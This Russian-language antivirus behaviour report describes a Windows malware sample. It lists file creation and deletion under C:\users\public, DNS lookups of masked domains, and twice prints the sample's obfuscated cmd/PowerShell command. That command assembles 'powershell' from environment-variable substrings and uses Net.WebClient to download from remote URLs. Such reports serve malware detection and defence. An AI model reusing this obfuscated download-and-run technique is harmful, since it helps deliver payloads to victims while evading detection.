Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Afghani46='Research40';$internetsolution28=new-object Net.WebClient;$collaboration90='http://re#####herstrading.com/0ccRGilOI@http://www....
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\639.exe
Удаляет следующие файлы
- C:\users\public\639.exe
Сетевая активность
UDP
- DNS ASK re#####herstrading.com
- DNS ASK so##ftp.com
- DNS ASK et###izthai.com
- DNS ASK cu###useli.com
- DNS ASK wp.###elooknung.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $Afghani46='Research40';$internetsolution28=new-object Net.WebClient;$collaboration90='http://re#####herstrading.com/0ccRGilOI@http://www....' (со скрытым окном)
